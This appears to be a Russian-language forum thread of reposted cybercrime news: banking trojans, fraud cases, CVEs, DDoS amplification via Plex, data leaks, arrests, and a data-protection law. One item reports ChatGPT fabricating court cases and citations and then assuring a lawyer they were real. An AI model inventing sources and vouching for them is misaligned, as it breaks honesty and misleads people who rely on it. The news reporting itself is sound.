При этом в июне 2024 года Врублевский-младший был заочно арестован. Ему предъявлены обвинения по статье об умышленном уничтожении чужого имущества, отсылающие к двум инцидентам, произошедшим еще в 2023 году. Тогда ранее судимый 20-летний уроженец Ставропольского края совершил поджоги двух автомобилей Audi RS Q8 и Mersedes-Benz GLE, принадлежавших жительнице поселка Потапово в Новой Москве. После задержания спортик дал показания, что заказ на преступления получил от Врублевского-младшего.
Мошенники представились сотрудниками Центробанка.
Юрию Алексеевичу Безверхову звонили на «Вотсап» два раза. Мошенники назвались сотрудниками Центробанка и убедили чиновника, что ему на счёт поступили незаконные средства, которые нужно вернуть. Преступники смогли выманить у Безверхова логины и пароли в банковские приложения и добрались до двух счетов: в «Альфа-Банке» и ВТБ.
В ноябре 2022 несколькими транзакциями они похитили с них 10,8 миллиона рублей. В марте повторили попытку — и похитили уже 33,5 млн. Поняв, что его обманули, замруководителя аппарата Госдумы пошёл в полицию. Там возбудили уголовное дело по мошенничеству в особо крупном размере.
Взломщик получал доступ к лицевым счётам и социальным сетям абонентов в личных целях.
На скамье подсудимых оказался бывший сотрудник ООО "Мобильные системы". Фигурант перевыпускал СИМ-карты клиентов "Билайн" по поддельным заявлениям при помощи программы сервисного обслуживания New DOL. В результате махинаций он получал доступ к лицевым счётам и социальным сетям абонентов.
В общей сложности подобным образом хакер похитил данные шести человек. Возбудили уголовное дело о неправомерном доступе к информации (ч. 3 ст. 272 УК РФ). По решению суда мужчину приговорили к одному году в колонии-поселении. Обвиняемый подал апелляцию и добился пересмотра наказания.
— Окончательно Симонову назначено наказание в виде 11 месяцев лишения свободы условно с испытательным сроком 2 года. Приговор вступил в законную силу.
Банковский троян для Android, ранее известный как Aberebot, вернулся под именем Escobar. Помимо ребрендинга, вредонос отметился новыми функциями, которые теперь позволяют ему красть коды мультифакторной аутентификации Google Authenticator.
Также среди новых возможностей Escobar стоит отметить получение контроля над заражённым устройством через VNC, запись аудио, снятие фотографий и извлечение учётных данных из определённых приложений.
Цель трояна — украсть такое количество информации, которое бы позволило операторам захватить банковские аккаунты жертвы и провести несанкционированные транзакции. Платформа для киберразведки DARKBEAST помогла выйти на русскоязычный форум, где разработчики Aberebot рекламируют новую версию своего зловреда под именем «Escobar Bot Android Banking Trojan». Соответствующий пост датируется февралём 2022 года.
Команда MalwareHunterTeam обнаружила подозрительный APK 3 марта 2022 года. Установщик был замаскирован под приложение McAfee и обходил подавляющее большинство антивирусных движков на VirusTotal.
Исследователи из Cyble проанализировали один из новых образцов Escobar и пришли к выводу, что троян, как многие его аналоги, умеет накладывать свои окна поверх легитимных приложений и взаимодействовать с банковским софтом. Вредонос способен атаковать 190 кредитных организаций из 18 разных стран.
Попав в систему, Escobar запрашивает в общей сложности 25 разрешений, 15 из которых используются исключительно для вредоносной активности: запись аудио, чтение СМС-сообщений, звонки на различные номера и получение геолокации устройства.
Использование кросс-платформенной утилиты VNC Viewer, предназначенной для просмотра и расшаривания экрана, позволяет операторам трояна делать с устройством практически всё, что они пожелают. Специалисты опубликовали список команд, доступных Escobar, с их описанием:
• Source: https://www.bleepingcomputer[.]com/...r-steals-your-google- authenticator-mfa-codes/
• Source: https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/
Некоторые операции проходят медленнее или требуют повторения
Банк России отмечает замедление работы Системы быстрых платежей (СБП) из-за
повышенного фона DDoS-атак на каналы телеком-провайдеров, на сохранность
средств это не повлияет, говорится в сообщении регулятора.
"В настоящий момент из-за повышенного фона DDoS-атак на каналы телеком- провайдеров возможно кратковременное замедление работы Системы быстрых платежей. Часть операций может проходить медленнее, или их потребуется повторить через некоторое время. Это никак не влияет на сохранность средств",
Операционный платежный и клиринговый центр СБП — АО «НСПК» взаимодействует с
телеком-провайдерами по текущей ситуации.
Система быстрых платежей (СБП) — сервис, с помощью которого можно совершать
межбанковские переводы по номеру мобильного телефона круглосуточно, без
праздников и выходных. Комиссии за такие переводы низки или вовсе отсутствуют.
К системе уже подключены более 200 банков, включая крупнейшие.
Источник: https://www.securitylab.ru/news/530458.php
Conti удалось привлечь «нескольких элитных разработчиков и менеджеров» TrickBot, превратив операцию в свою дочернюю компанию.
После четырех лет вредоносной деятельности группировка TrickBot приняла решение завершить работу своей преступной операции, поскольку главные участники перешли под руководство Conti.
TrickBot — вредоносная платформа для устройств под управлением Windows, использующая несколько модулей для различных вредоносных действий, включая кражу информации, кражу паролей, проникновение в домены Windows, обеспечение первоначального доступа к сетям и установку вредоносных программ.
TrickBot доминирует на рынке вредоносных программ с 2016 года, сотрудничая с вымогательскими группировками и вызывая хаос на миллионах устройств по всему миру.
Первоначально с TrickBot сотрудничала группировка Ryuk, но вскоре место последней заняли операторы Conti, которые использовали вредоносное ПО в течение прошлого года для получения доступа к корпоративным сетям.
Исследователи в области кибербезопасности из компании Advanced Intelligence (AdvIntel) обнаружили , что в 2021 году Conti стала единственным бенефициаром доступа к сетям, скомпрометированным TrickBot. К этому времени основная команда разработчиков TrickBot уже создала более скрытную вредоносную программу BazarBackdoor, используемую в основном для удаленного доступа к особо важным корпоративным сетям, где могут быть развернуты программы- вымогатели. Поскольку троян TrickBot стал легко обнаруживаться антивирусным ПО, киберпреступники стали чаще использовать BazarBackdoor для начального доступа к сетям.
Однако к концу 2021 года Conti удалось привлечь «нескольких элитных разработчиков и менеджеров» TrickBot, превратив операцию в свою дочернюю компанию, а не в партнера. По словам специалистов AdvIntel, BazarBackdoor перешел из набора инструментов TrickBot в автономный инструмент, разработка которого контролируется синдикатом вымогателей Conti. Главный администратор группы Conti сказал, что поскольку «бот мертв», они переводят Conti с TrickBot на BazarBackdoor в качестве основного способа получения первоначального доступа.
source: advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff- is-already-in-the-works
Специалисты подразделения Microsoft по борьбе с киберпреступлениями (Digital Crimes Unit, DCU) перехватили контроль над 17 доменами, используемыми мошенниками в ходе кампании по осуществлению BEC-атак (business email compromise – компрометация деловой почты) на пользователей Microsoft Office 365.
Домены, изъятые Microsoft, являлись «омоглифическими» и были зарегистрированными с целью замаскироваться под легитимные домены. Идея состоит в использовании одинаково выглядящих символов для визуального обмана пользователей. Омоглиф — одна из двух или более графем, знаков или глифов с формами, которые или кажутся идентичными, или не могут быть дифференцированы быстрым визуальным осмотром. Например, русская «а» и английская «a» — омоглифы.
«Злоумышленники используют вредоносные омоглифические домены вместе с украденными учетными данными клиентов для незаконного доступа к учетным записям, отслеживания трафика электронной почты клиентов, хищения информации о незавершенных финансовых транзакциях», — сообщили в Microsoft.
Как сообщили специалисты, организаторы данной вредоносной кампании являются «частью обширной преступной сети, которая предположительно базируется в Западной Африке». Злоумышленники в основном нацелены на малые предприятия в Северной Америке, работающие в нескольких отраслях промышленности.
С помощью похищенной информации преступники выдают себя за клиентов и обманом пытаются заставить потенциальных жертв переводить денежные средства. Как только мошенники получают доступ к сети, они выдают себя за сотрудников компаний и атакуют доверенные сети, поставщиков, подрядчиков и партнеров, пытаясь обманом заставить их отправлять или утверждать мошеннические финансовые платежи.
• Source: https://s3.documentcloud.org/documents/21012135/complaint.pdf
Компания Trend Micro сообщила, что злоумышленники используют ошибку в ее антивирусных продуктах, чтобы получать права администратора в Windows.
Уязвимость, имеющая идентификатор CVE-2020-24557, затрагивает Apex One и OfficeScan XG, два защитных решения компания, ориентированные на корпоративных клиентов. Проблему еще в прошлом году обнаружил специалист Microsoft Кристофер Велла, который в частном порядке уведомил Trend Micro об этом баге через программу Zero-Day Initiative.
Trend Micro исправила уязвимость еще в августе 2020 года, но теперь специалисты компании обновили исходный бюллетень безопасности и сообщили, что стало известно об инцидентах, в которых эту проблему эксплуатировали для атак на некоторых клиентов.
Хотя баг не мог использоваться для непосредственно для взлома систем, он применялся на последующих этапах атаки в многоуровневой цепочке эксплоитов: когда хакеры уже поместили вредоносный код на компьютер жертвы и им нужно было получить полный контроль над целевой машиной.
Пока Trend Micro не раскрывает никаких деталей о злоумышленниках и пострадавших. Но стоит отметить, что за последние годы это уже четвертая уязвимость в продуктах Apex One и OfficeScan XG, которая использовалась хакерами: в 2019 и 2020 годах фиксировались атаки на уязвимости CVE-2019-18187, CVE-2020-8467 и CVE-2020-8468. Первая из перечисленных проблем была использована китайской кибершпионской хак-группой во время атаки на компанию Mitsubishi Electric.
Источник: xakep.ru/2021/04/22/one-more-bug-exploited/
Аналитики компании NetScout предупредили, что хакеры нашли способ использовать системы с установленным Plex Media Server для усиления DDoS-атак. Проблема заключается в том, что приложение можно не только установить на обычный веб- сервер, но оно часто поставляется с устройствами NAS, медиаплеерами или другими IoT-девайсами.
По данным специалистов, все дело в том, что когда сервер или устройство, на котором запущен Plex Media Server, загружается и подключается к сети, запускается локальное сканирование для поиска совместимых устройств и для этого используется протокол SSDP. И если Plex Media Server обнаруживает локальный маршрутизатор с включенной поддержкой SSDP, он добавляет специальное NAT-правило, чтобы сервис Plex Media SSDP (PMSSDP) был доступен через интернет (порт UDP 32414).
Увы, протокол SSDP уже давно известен как излюбленный злоумышленниками вектор для усиления мощности DDoS-атак, а значит девайсы с установленным Plex Media Server – это интересная цель для злоумышленников. Согласно Netscout, коэффициент усиления DDoS в таком случае составляет около 4,68, то есть Plex Media Server усиливает входящие пакеты PMSSDP с 52 байтов до примерно 281 байта.
Исследователи предупреждают, что обнаружили в сети более 27 000 устройств с Plex Media Server, которые могут быть использованы для DDoS-атак. Хуже того, хакерам уже известно об этом способе амплификации, и эксперты Netscout пишут, что не просто наблюдали такие атаки, но они уже становятся обычным делом. PMSSDP-атаки обычно достигают пиковой мощности 2-3 Гбит/сек, но, по словам специалистов, это не предел.
«Общее количество атак [с использованием PMSSDP] с 1 января 2020 года по сегодняшний день составило примерно 5700 (от общего числа в 11 000 000 атак, которые мы наблюдали за этот период), — уточили представители Netscout в беседе с журналистами Bleeping Computer. — Мы заметили использование этого способа еще в ноябре 2020 года, когда активность резко возросла, но в большинстве случаев мы видим, что его используют в мультивекторных атаках, а не в качестве основного вектора».
Click to expand...
Источник: xakep.ru/2021/02/05/pmssdp-ddos/
ЛОЛ
т.е получается,теперь, чтобы парсить доски объявлений,реально необходимо
получать разрешения каждого пользователя
А как-же таргетированная и иная реклама?!которая по факту строится на сборе
данных пользователей с последующей рассылкой-(допустим) по этим
пользователям?!
Че теперь как бабки будут зарабатывать маркетологи или например такие сервисы
как Церебро-которое собирает телефоны почты фио и тд?Таргетхантер?!-они че
будут делать?! у них партнерства с ВК на распространение данных пользователей?
Типа, Вы решили свой сайт запилить и там обозначали, что предоставляете услуги
по парсингу, но делаете это не через таргетхантер а у вас свой самопис, т.е
бл#ть вас набутылят за это???
А типа если, через таргетхантер у которого (мб партнерства с вк) то не ничего
не будет хD
Окей далее, что делать сайтам по проверке Контрагентов????
Бас,датакул,зенка- они я так понимаю тоже все?наработались?!
т.е владельцы датакул,зеннопостера - должны сейчас убрать свои ФИО и слова
"парсинг"отовсюду, чтобы их не посадили или не попали под распространение
данного закона или что?
С 01 марта 2021 года вступают в силу новые правила обработки персональных данных, сделанных доступными неопределенному кругу третьих лиц «общедоступных персональных данных».
Поправки введены законом N 519-ФЗ от 30.12.2020 и существенным образом меняют порядок использования персональных данных, находящихся в общем доступе, и в первую очередь, размещенных на сайтах в сети Интернет. В большей части поправки важны для сайтов по типу агрегаторов и социальных сетей. Однако и корпоративным сайтам с отзывами и контактными данными сотрудников тоже досталось.
Как всегда, смотрите подробности под катом.
Из закона исключается понятие «персональные данные, сделанные общедоступными субъектом персональных данных », используемое в качестве правового основания обработки таких ПДн любыми лицами (пп.10 п.1 ст.6 152-ФЗ). Взамен вводится понятие «персональные данные, разрешенные субъектом персональных данных для распространения ».
Принципиальное отличие этих понятий в режиме использования персональных данных, доступ к которым предоставляется третьим лицам. Новые условия предусматривают получение отдельного согласия субъекта ПДн на их распространение и обработку третьими лицами, тогда как ранее такое согласие предполагалось (достаточно было доказать факт их публикации субъектом ПДн или с его разрешения).
Как следствие, с 01 марта 2021 года нельзя собирать и использовать опубликованные в Интернете сведения об отдельном лице или массово извлекать и осуществлять последующее использование персональных данных с сайтов и прочих ИСПДн в автоматическом режиме (посредством «парсинга»), если не получено согласие каждого субъекта на такие действия. Ссылка на то, что сведения «общедоступны» перестает работать.
Требуется ли владельцам сайтов согласие на обработку публикуемых персональных данных
Нужно понимать, что отдельное согласие на обработку персональных данных, разрешенных субъектом персональных данных для распространения, требуется только для случаев, когда нет иных законных оснований для их обработки.
Обычно владельцы сайтов осуществляют сбор и последующее использование персональных данных пользователей в целях заключения или исполнения договора. Это самостоятельное основание для обработки ПДн, не требующее отдельного согласия (пп.5 п.1 ст.6 ФЗ 152). В таком случае достаточно сформулировать условия договора с пользователем в общем виде в Пользовательском соглашении, а порядок обработки ПДн включить в Политику конфиденциальности.
Если сайт позволяет публиковать персональные данные в общем доступе, то важно обозначить, что пользователь раскрывает такие данные неопределенному кругу лиц по собственной инициативе (п.2 ст.10.1 ФЗ 152 в новой редакции). Для предоставления доступа к таким сведениям третьим лицам администрации не требуется отдельное согласие субъекта, поскольку у нее есть действующий договор. Однако третьим лицам потребуется подтвердить наличие законных оснований для копирования материалов с сайта и их последующего использования, поскольку прямого договора с субъектом у них нет.
Поэтому примем за общее правило, что согласие на обработку ПДн требуется при отсутствии между сторонами сделки. В законе есть и другие основания для обработки ПДн без согласия субъекта (например, такое право дано журналистами в целях их профессиональной деятельности или гос. органам - для осуществления возложенных на них функций и т.д.). Однако это частные случаи, которые не касаются оборота данных в гражданских отношениях.
Возьмем в качестве наглядного примера вариант сайта, на котором персональные данные публикуются администрацией. В основном, это корпоративные сайты с фотографиями сотрудников компании, их именами, телефонами и электронными адресами, размещаемыми в имиджевых или сервисных целях. У администрации отсутствует договор с сотрудником, предусматривающий обработку его ПДн указанным способом. Поэтому требуется получить отдельное согласие на предоставление доступа и распространение ПДн сотрудника на сайте компании.
Таким образом, изменения направлены на пресечение бесконтрольного использования персональных данных неопределенным кругом лиц. Субъекту вернули контроль над его персональными данными. Теперь он волен давать согласие на обработку ПДн неопределенным кругом лиц или конкретным лицам, вводить ограничения и условия использования отдельных персональных данных, опубликованных в общем доступе.
Ограничения и условия использования персональных данных
Наибольшие затруднения с правовой и технической стороны вызывают изменения 152-ФЗ в части возможности установления субъектом персональных данных в согласии ограничений и условий их использования.
Оператор ПДн обязан обеспечить субъекту персональных данных возможность определить перечень персональных данных по каждой категории персональных данных, указанной в согласии на обработку персональных данных, разрешенных субъектом персональных данных для распространения (п.1 ст.10.1 ФЗ 152).
Если в согласии прямо не указано, что субъект не установил запретов и условия их использовании или не определил категории и перечень ПДн, к которым такие запреты и условия относятся, оператор ПДн вправе осуществлять их обработку без передачи (распространения, предоставления, доступа) и возможности осуществления иных действий с персональными данными неограниченному кругу лиц (п.5 ст.10.1 ФЗ 152).
На основании п.9 новой статьи 10.1 ФЗ 152, в согласии на обработку персональных данных, разрешенных субъектом персональных данных для распространения, субъект персональных данных вправе установить запреты на передачу (кроме предоставления доступа) этих персональных данных оператором неограниченному кругу лиц, а также запреты на обработку или условия обработки (кроме получения доступа) этих персональных данных неограниченным кругом лиц.
При этом оператор обязан обеспечить субъекту возможность установления запретов и условий использования персональных данных. Отказ оператора в установлении субъектом персональных данных предусмотренных выше запретов и условий, не допускается.
Более того оператор, оператор обязан в срок не позднее 3 рабочих дней с момента получения соответствующего согласия субъекта персональных данных опубликовать информацию об условиях обработки и о наличии запретов и условий на обработку неограниченным кругом лиц персональных данных, разрешенных субъектом персональных данных для распространения (п.10 ст.10.1 ФЗ 152).
Иными словами, для обеспечения возможности использования третьими лицами опубликованных в общем доступе персональных данных, помимо ознакомления с ними (получения доступа), владелец сайта (оператор ИСПДн) обязан получить согласие субъекта на их распространение. Одновременно оператор должен обеспечить возможность установления запретов и условий использования отдельных категорий и перечня ПДн и опубликовать данную информацию.
Представьте себе сайт для поиска работы, на котором публикуются резюме соискателей, или доску объявлений, где есть контактные данные пользователей. Как обеспечить с 1 марта возможность копирования с них персональной информации пользователей, размещенной в общем доступе?
Выше мы рассмотрели 2 варианта правовых оснований для обработки ПДн: по договору и на основании согласия. Что необходимо сделать в каждом из указанных случаев?
При наличии договора с субъектом ПДн согласие необходимо получать для обеспечения возможности копирования и последующего использования персональных данных неопределенным кругом лиц. Если такой задачи перед администрацией сайта не стоит, можно ограничиться включением в соглашение (договор) с пользователем и политику конфиденциальности, условий о возможности из предоставления заранее определенному кругу лиц (например, агентствам по подбору персонала или работодателям в примере с сайтами поиска работы).
Если владелец сайта по каким-то причинам намерен распространять ПДн пользователей заранее неопределенному кругу лиц (например, любым интернет- пользователям), потребуется выполнить план мероприятий по ограничению копирования третьими лицами персональных данных пользователей до получения тельных согласий, обеспечению возможности установления различных запретов и условий использования таких данных и публикации таких сведений совместно с такими данными.
Полагаем, что операторов, желающих делиться данными со всеми, найдется не много. Поэтому поправки в ФЗ 152 в целом можно воспринимать в положительном ключе для большинства агрегаторов, поскольку они явным образом запрещают парсинг. Для корпоративных сайтов новшества не несут ничего хорошего, т.к. потребуется получать отдельные согласия со всех субъектов, персональные данные которых у них публикуются
источник: https://habr.com/ru/post/544788/
Специалист Positive Technologies Егор Димитренко обнаружил уязвимость, которая позволяет злоумышленникам обойти механизм аутентификации и получить доступ к управлению Carbon Black Cloud Workload с максимальными привилегиями.
Уязвимость CVE-2021-21982, получившая оценку 9,1 по шкале CVSS v3, была найдена в Carbon Black Cloud Workload 1.0.1 (и более ранних версиях) — в локальном решении, которое связывает VMware vCenter Server (приложение для централизованного управления средами VMware vSphere) и VMware Carbon Black Cloud.
«Для атаки не требуется авторизация: любой пользователь, имеющий доступ к интерфейсу, может заполучить токен для работы с системой в обход легитимного процесса аутентификации, — объясняет Егор Димитренко. — Интерфейс уязвимого приложения, как правило, доступен во внутренней сети организации, но в некоторых случаях открыт для атаки из интернета. Имея токен аутентификации, злоумышленник получает возможность работать в приложении Carbon Black Cloud Workload с максимальными привилегиями. Так как данное решение является связующим звеном между vCenter Server внутри сети компании и облачным решением для мониторинга безопасности виртуальных машин, то имея максимальные привилегии, злоумышленник может нарушить эту связь и приостановить работу защитных механизмов».
Click to expand...
Причиной возникновения уязвимости CVE-2021-21982 исследователь называет недостаточную проверку доступа к некоторым частям приложения, основанную на механизме черного списка, который является не таким эффективным с точки зрения безопасности, как доступ по белому списку.
Для устранения уязвимостей необходимо руководствоваться рекомендациями, которые указаны в официальном уведомлении компании VMware.
Источник: xakep.ru/2021/04/12/carbon-black-cloud-workload/
Recently i heard . . "
former Ermac/Hook seller died in the Northern Military District.
His telegram profile was recently deleted after a year and his username
DukeEugene was taken over by a scammer."
"I** s that true, or is the Duke still alive? "**
**Недавно я услышал... "
бывший продавец Ермака/Крюка погиб в Северном военном округе.
Его профиль в телеграме был недавно удален через год, а имя пользователя
DukeEugene занял мошенник."**
" Это правда, или герцог еще жив?"
17-летний житель Красноярска три года звонил в госучреждения с угрозами.
В Красноярском крае полицейские задержали 17-летнего подростка, который три года звонил в госучреждения с сообщениями о минировании.
17-летнего подростка подозревают в сотнях ложных сообщениях о минировании.
Фото: ГУ МВД России по Красноярскому краю
Вышли на него после последнего случая. В середине декабря сообщение о
минировании поступило в суд поселка Шушенский. Полицейские тогда обследовали
помещение, но взрывных устройств не нашли. Расследованием происшествия
занимались сотрудники МВД вместе с оперативниками ФСБ. Так они выявили
причастность к звонку жителя поселка Нижний Суэтук.
«В ходе обысков по месту жительства подозреваемого силовиками обнаружены и изъяты банковские карты, SIM-карта, планшет, ноутбук, сотовый телефон. Полицейскими установлено, что противоправную деятельность молодой человек осуществлял на протяжении 3 лет. Подозреваемый за денежное вознаграждение принимал заказы от третьих лиц через мессенджер, после чего, используя программу для подмены голоса, осуществлял звонки в различные учреждения», - рассказали в полиции.
Звонки подросток совершал с 2021 по 2023 год. Всего он сделал 350 ложных сообщений о нахождении взрывных устройств в зданиях школ и детсадов, органов государственной власти, торговых центров, объектах транспортной инфраструктуры на территории буквально всех регионов РФ.
Подросток сейчас находится под стражей. Возбуждено уголовное дело по статье «Заведомо ложное сообщение об акте терроризма». Молодому человеку грозит до 8 лет лишения свободы. Возраста уголовной ответственности он достиг.
Откуда поступали задания и сколько подросток получал за их выполнение, сейчас выясняют следователи.
Напомним, массовое «минирование» школ и других объектов в стране началось в конце 2021 года. А пик пришелся на январь 2022. Так, в Красноярске 13-14 января массово эвакуировали детей из школ из-за ложных сообщений о взрывчатке. А в конце месяца стало известно, что задержали двух подростков, которых подозревают в этих сообщениях.
Министерство внутренних дел России выпустило приказ, ограничивающий полномочия
Интерпола в России. Соответствующий документ появился
на
сайте официального опубликования правовых актов.
В перечне оперативных подразделений органов внутренних дел РФ, правомочных
осуществлять оперативно-розыскную деятельность, Интерпол указан под пунктом 7.
В отличие от других подразделений, полномочия которых обозначены «в полном
объеме», деятельность Интерпола ограничена опросами, наведением справок,
отождествлением личности.
Интерпол – крупнейшая в мире международная полицейская организация, в состав
которой входят 195 государств. Основной задачей Интерпола является развитие и
координация сотрудничества национальных правоохранительных органов в борьбе с
преступностью. Россия вступила в Интерпол в 1990 г. Его подразделения
действуют в 80 субъектах РФ.
Наличие доступа к инструментам Интерпола позволяет сотрудникам
правоохранительных органов координировать совместные действия с зарубежными
партнерами и проводить совместные операции, а также получать необходимую
оперативную информацию.
_<https://www.vedomosti.ru/society/news/2023/08/18/990861-mvd-ogranichilo- polnomochiya-interpola>
Американский юрист использовал в суде «фиктивные» цитаты, сгенерированные ChatGPT. Выяснилось, что чат-бот в своих ответах ссылался на несуществующие дела.
В рамках процесса против колумбийской авиакомпании Avianca адвокат представил краткий обзор предыдущих дел, который сгенерировал ChatGPT. Сторона ответчика доказала в суде, что таких кейсов не существовало. После этого окружной судья США Кевин Кастел подтвердил, что «шесть из представленных дел представляют собой фиктивные судебные решения с фиктивными цитатами и фиктивными внутренними ссылками». Он назначил слушание для рассмотрения санкций в отношении адвокатов истца.
Юрист Стивен А. Шварц признался под присягой, что использовал чат-бота OpenAI для своего выступления. Чтобы проверить правдивость его ответов, адвокат лишь спросил чат-бота, не лжет ли тот. ChatGPT утверждал, что все приведённые в ответе дела были реальными.
В одном несуществующем деле под названием Varghese против China Southern Airlines Co., Ltd., чат-бот, казалось, ссылался на другое реальное дело, Zicherman против Korean Air Lines Co., Ltd., но неправильно указал дату и другие подробности этого кейса.
По словам Шварца, он «не знал», что чат-бот может лгать. Теперь он «сильно сожалеет о том, что использовал генеративный искусственный интеллект для дополнения юридического исследования».
Другой адвокат той же фирмы, Питер ЛоДука, стал официальным поверенным по делу, и ему придётся предстать перед судьей, чтобы объяснить, что именно произошло.
Ранее судья в Колумбии использовал ChatGPT для консультации перед вынесением приговора. Однако решение он принимал самостоятельно, а чат-бот выступал в роли «консультанта».
В другом случае ChatGPT ошибочно внёс профессора права Джонатана Тёрли в список юристов, которых обвиняли в сексуальных домогательствах. В качестве источника информации чат-бот привёл статью в WP от марта 2018 года. Однако такой статьи не существует.
source: documentcloud.org/documents/23826751-mata-v-avianca-airlines- affidavit-in-opposition-to-motion?responsive=1&title=1
Популярный VPN-сервис SuperVPN оказался маскированной фермой данных, которая хранила и продавала персональные данные своих пользователей.
Джеремайя Фаулер обнаружил серьезное нарушение безопасности в открытой базе данных, связанной с популярным бесплатным VPN-сервисом SuperVPN. В базе данных содержалось 360 308 817 записей, общим объемом 133 ГБ. В этих записях была обнаружена широкий спектр конфиденциальной информации, включая адреса электронной почты пользователей, исходные IP-адреса, геолокационные данные и записи об использовании серверов.
Кроме того, в результате утечки были раскрыты секретные ключи, уникальные номера пользователей приложения и номера UUID, которые могут быть использованы для идентификации дополнительной полезной информации.
Другая информация, найденная в базе данных, охватывала модели телефонов или устройств, операционные системы, типы интернет-соединений и версии VPN- приложений. Кроме того, в утечке присутствовали запросы на возврат средств и данные об оплаченных аккаунтах.
Несмотря на то, что SuperVPN утверждает, что не хранит журналы пользователей, утечка данных показывает обратное и противоречит политике компании. Это также свидетельствует о том, что “Почти каждый крупный бесплатный VPN-сервис является маскированной фермой данных”.
С ростом обеспокоенности по поводу онлайн-конфиденциальности и безопасности спрос на VPN-сервисы возрос в последние годы. В результате рынок стал свидетелем значительного увеличения количества VPN-приложений, доступных для пользователей.
Однако этот скачок предложений привел к тревожному количеству VPN-приложений, которые ненадежны и не обеспечивают ожидаемого уровня конфиденциальности и безопасности. Это приводит к контрпродуктивному пользовательскому опыту, поскольку отсутствие адекватных протоколов безопасности подвергает их информацию риску быть утраченной в результате нарушения данных.
По данным отчета vpnMentor, большинство записей в утечке данных были связаны с SuperVPN - бесплатным VPN-приложением, доступным как в Apple App Store, так и в Google Play Store.
Кроме того, исследователи отметили два приложения с названием SuperVPN, каждое из которых принадлежало разным разработчикам. Qingdao Leyou Hudong Network Technology Co. была разработчиком SuperVPN для iOS, iPad и macOS, а SuperSoft Tech разработала второе приложение с тем же названием.
Однако важно отметить, что это НЕ первый раз, когда SuperVPN обвиняется в утечке персональных данных своих ничего не подозревающих пользователей. На самом деле, как сообщал SecurityLab.ru в мае 2022 года, SuperVPN был в списке бесплатных VPN-сервисов , e которых утекли данные более 21 миллиона пользователей.
В отчете vpnMentor Фаулер заметил, что электронные адреса службы поддержки клиентов SuperVPN были связаны с StormVPN, Luna VPN, RocketVPN и GhostVPN. Кроме того, ссылки на каждого из этих VPN-провайдеров были замечены в базе данных.
Хотя нет способа подтвердить, что все они принадлежат одной и той же компании, это не стало бы сюрпризом если бы это было так. Распространение ненадежных VPN-приложений может быть приписано профитным разработчикам стремятся извлечь выгоду из растущего спроса на конфиденциальность и безопасность.
source: vpnmentor.com/news/report-super-vpn-breach
Сотрудник «Газпромбанка» украл 27 миллионов рублей со счёта клиента. Но вместо безбедной старости теперь его ждёт тюремный срок.
О крупной краже следователи узнали от пострадавшего. 14 октября в полицию пришёл клиент «Газпромбанка», сотрудник дипломатической академии МИД. Мужчина рассказал, что с его счёта пропали 27 миллионов рублей. Телефонные мошенники были ни при чём — кто-то из сотрудников получил доступ к банковским счетам клиента и похитил крупную сумму.
Через две недели оперативники смогли выйти на подозреваемого — 34-летнего Вагана Трапизоняна из Сочи. По версии следствия, воспользовавшись служебным положением, он обчистил счёт сотрудника академии. 1 ноября Трапизоняна задержали, он уже дал признательные показания.
Анонимная команда разработчиков проекта DeFi распродала свои токены, вызвав обвал курса, и скрылась. Создатели WhaleFarm похитили криптовалюты клиентов на $2.3 млн.
WhaleFarm был запущен в этом месяце, причем изначально были подозрения, что это мошеннический проект. Разработчики обещали годовой доход до 7 217 848%. Для доходного фермерства проект принимал большое количество различных криптовалют, включая BNB, BUSD, USDT, BTC, ETH, ADA, DOT и LINK.
Баснословная прибыль, как оказалось, привлекла достаточно много пользователей, и курс токена WhaleFarm показал заметный рост. Однако после того, как разработчики продали свои запасы токенов, курс за считанные минуты рухнул на 99% и токен теперь торгуется ниже $0.2. Одновременно с этим они удалили официальную группу в мессенджере Telegram и аккаунт в Twitter.
Как видим, разработчики совершили классический «экзит-скам». Пока неясно, сколько создатели WhaleFarm получили от продажи токенов, но, по предварительным оценкам, они похитили вложенные в проект криптовалюты на сумму $2.3 млн.
Фигурант разработал программу для удаленного управления данными на серверах пострадавших. Свою разработку он продавал на форумах и в дальнейшем с ее использованием хакеры совершали атаки на различные компании и учреждения. Правонарушителю объявили подозрение.
Противоправную деятельность 27-летнего жителя Черновцов разоблачили сотрудники Департамента киберполиции совместно с Главным следственным управлением Нацполиции.
Мужчина разработал программу по типу Obfuscated Web Backdoor для шифрования программного кода и модифицированное вредоносное обеспечение для удаленного контроля над вебресурсами. Таким образом разработка фигуранта позволяла скрыть вредоносное программное обеспечение на пораженном ресурсе и оставлять контроль над ним незаметным для владельца.
Вредоносную программу он продавал на тематических форумах. В дальнейшем разработку использовали другие хакеры для атак иностранных кампаний и дальнейшего совершения киберпреступлений.
Параллельно фигурант применял другую программу, которая искусственно повышала рейтинг и поисковую выдачу вебстраницы в обход правил использования и продвижения вебресурсов поисковых систем.
В доме фигуранта работники полиции провели обыск, изъяли компьютерную технику, которую передали на экспертизу.
Мужчине объявили подозрение в совершении уголовного правонарушения, предусмотренного ч. 2 ст. 361-1 (Создание с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения или сбыта) Уголовного кодекса Украины. Подозреваемому может грозить до пяти лет лишения свободы.
ЖурналистыThe Guardian[пролили](https://www.theguardian.com/world/article/2024/may/28/spying- hacking-intimidation-israel-war-icc-exposed?ref=news.risky.biz) свет на десятилетнюю секретную операциюИзраиля, связанную с кибершпионажем и давлением на членовМеждународного уголовного суда (МУС).
СпецслужбыИзраиля задействовали все свои самые передовые киберинструменты и перехватывали переписку, звонки, электронные письма и документы должностных лицМУС, в том числе главного прокурораКарима Хана и его предшественницы на постуФаты Бенсуда.
Благодаря этому премьер-министруИзраиля Биньямину Нетаньяху удалось заранее узнать о намерениях прокурора выдать ордера на арест израильтян.
По данным журналистов, разведоперация была под особым контролемНетаньяху и велась с позицииШин Бет, Аман и Unit 8200.
Инициирована она была в 2015 году после признания вООН и присоединенияПалестины к суду, а приступившая тогда к расследованию ситуации вПалестине Фату Бенсуда получила первые угрозы буквально уже через месяц.
По словам источников, благодаря полному доступу к палестинской телекоммуникационной инфраструктуре сотрудники разведки могли перехватывать звонки, не устанавливая шпионское ПО на устройства чиновниковМУС.
По словам нынешних и бывших сотрудников разведки, военные кибернаступательные группы иШин Бет систематически следили за сотрудниками палестинских НПО и Палестинской администрации, которые сотрудничали сМУС, с помощью шпионского ПОPegasus от NSO.
Позже, когда дело запахло жаренным,Бенсудой занялся сам шефМоссада Йосси Коэн, который провел ряд неформальных встреч с ней, буквально каждый раз неожиданно появляясь рядом с ней из ни от куда.
